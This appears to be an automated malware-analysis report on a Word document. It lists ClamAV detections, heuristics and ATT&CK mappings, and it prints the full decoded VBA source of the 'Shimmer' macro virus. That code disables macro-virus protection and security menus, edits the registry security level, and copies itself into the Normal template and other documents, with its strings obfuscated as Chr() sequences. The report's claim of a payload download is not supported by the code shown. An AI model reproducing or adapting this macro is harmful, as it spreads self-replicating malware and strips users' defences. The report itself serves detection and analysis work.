MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating an attempt to execute malicious code upon opening. The macro attempts to disable security settings and appears to be designed to download and execute a secondary payload, as suggested by the ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Bench-2'. The VBA code is truncated, but the intent to disable security and run a macro is clear.
Heuristics 5
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6442 bytes |
SHA-256: bd94e872e14da1ba7a86b65a3b824cb4c79146440a747bd15f87c1028e8ed61e |
|||
|
Detection
ClamAV:
Doc.Trojan.Bench-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
MACRONAME = BENCH
On Error Resume Next
AD_Installed = False: NT_Installed = False
If Application.Version = 9# Then
CommandBars("Macro").Controls("Security...").Delete
Else
With Application.Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
With Application.CommandBars("Tools")
.Controls("Templates and Add-Ins...").Enabled = False
.Controls("Customize...").Enabled = False
.Controls("Macro").Delete
End With
Application.CommandBars("View").Controls("Toolbars").Delete
Application.CommandBars("Format").Controls("Style...").Delete
Options.ConfirmConversions = False
Set NTC = NormalTemplate.VBProject.VBComponents.Item(1): Set ADC = ActiveDocument.VBProject.VBComponents.Item(1)
N_Identify = NTC.CodeModule.Lines(2, 1): A_Identify = ADC.CodeModule.Lines(2, 1)
If UCase(N_Identify) = "MACRONAME = BENCH" Then NT_Installed = True
If UCase(A_Identify) = "MACRONAME = BENCH" Then AD_Installed = True
N_Lines = NTC.CodeModule.CountOfLines: A_Lines = ADC.CodeModule.CountOfLines
If NT_Installed = True And AD_Installed = True Then GoTo over
If NT_Installed = False And N_Lines > 0 Then NTC.CodeModule.DeleteLines 1, N_Lines
If AD_Installed = False And A_Lines > 0 Then ADC.CodeModule.DeleteLines 1, A_Lines
If NT_Installed = False Then
With NTC.CodeModule
.AddFromString (Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(65) + Chr(117) + Chr(116) + Chr(111) + Chr(67) + Chr(108) + Chr(111) + Chr(115) + Chr(101) + Chr(40) + Chr(41) & vbCr & ADC.CodeModule.Lines(2, A_Lines))
.ReplaceLine 76, Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(86) + Chr(105) + Chr(101) + Chr(119) + Chr(86) + Chr(66) + Chr(67) + Chr(111) + Chr(100) + Chr(101) + Chr(40) + Chr(41)
End With
Application.Caption = Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(87) + Chr(111) + Chr(114) + Chr(100) + Chr(32) + Chr(40) + Chr(66) + Chr(41)
End If
If AD_Installed = False Then
With ADC.CodeModule
.AddFromString (Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(65) + Chr(117) + Chr(116) + Chr(111) + Chr(79) + Chr(112) + Chr(101) + Chr(110) + Chr(40) + Chr(41) & vbCr & NTC.CodeModule.Lines(2, N_Lines))
.ReplaceLine 76, Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(84) + Chr(111) + Chr(111) + Chr(108) + Chr(115) + Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111) + Chr(40) + Chr(41)
End With
End If
over:
If Minute(Now) >= 30 And Minute(Now) <= 40 Then
ActiveDocument.Content.Font.Animation = wdAnimationSparkleText
With Assistant.NewBalloon
.Icon = msoIconAlert
.Heading = "[Bench] MV97/2000"
.Text = "Our Motto:" & vbCr & _
"Tell me, I forget;" & vbCr & _
"Show me, I remember;" & vbCr & _
"Involve me, I understand." & vbCr & vbCr & _
"Skyline College..." & vbCr & "On our way to success! ;)" _
& vbCr & "(Hopefully)"
.Animation = msoAnimationGetAttentionMajor
.Show
End With
ElseIf Minute(Now) > 40 And Minute(Now) <= 0 Then
ActiveDocument.Content.Font.Animation = wdAnimationShimmer
With Assistant.NewBalloon
.Icon = msoIconAlert
.Heading = "Shimmer 2K"
.Text = "I was born to shimmer! Was born to shine! Born to radiate!" _
& vbCr & vbCr _
& "Sigh! Everything's getting fuzzy and blurred..."
.Animation = msoAnimationGetAttentionMajor
.Show
End With
End If
If NT_Installed = True And AD_Installed = False And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
MsgBox Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(112) + Chr(114) + Chr(111) + Chr(103) + Chr(114) + Chr(97) + Chr(109) + Chr(32) + Chr(104) + Chr(97) + Chr(115) + Chr(32) + Chr(112) + Chr(101) + Chr(114) + Chr(102) + Chr(111) + Chr(114) + Chr(109) + Chr(101) + Chr(100) + Chr(32) + Chr(97) + Chr(110) + Chr(32) + Chr(105) + Chr(108) + Chr(108) + Chr(101) + Chr(103) + Chr(97) + Chr(108) + Chr(32) + Chr(111) + Chr(112) + Chr(101) + Chr(114) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(32) + Chr(97) + Chr(110) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(108) + Chr(108) + Chr(32) + Chr(115) + Chr(104) + Chr(117) + Chr(116) + Chr(32) + Chr(100) + Chr(111) + Chr(119) + Chr(110) + Chr(46), vbCritical, "Microsoft Word"
If NT_Installed = True And AD_Installed = False And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
Application.Quit
End Sub
' =================================
' | Greetz go out to: |
' | SlageHammer - Thanks a lot! |
' |===============================|
' | Ya'll ppl from Skyline! |
' | LOL They formatted the comps. |
' | infected with a GROOVIE var. |
' |===============================|
' | Everyone else out there readn |
' | this! |
' | AVP, NAI and Symantec ppl! =) |
' |===============================|
' | Macro's Name - Shimmer |
' | Author - [Bench] |
' |===============================|
' | Author's Comments: |
' | The code is all jumbled up and|
' | garbage. Hey! It's my first |
' | original macro! |
' | And I'm a newbie! |
' |===============================|
' | excess: |
' | Payload idea from Sparkle 97 |
' | and the song "Shimmer" by |
' | Shawn Mullins... ;P |
' =================================
' This macro shows what boredom can do to a guy :D
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.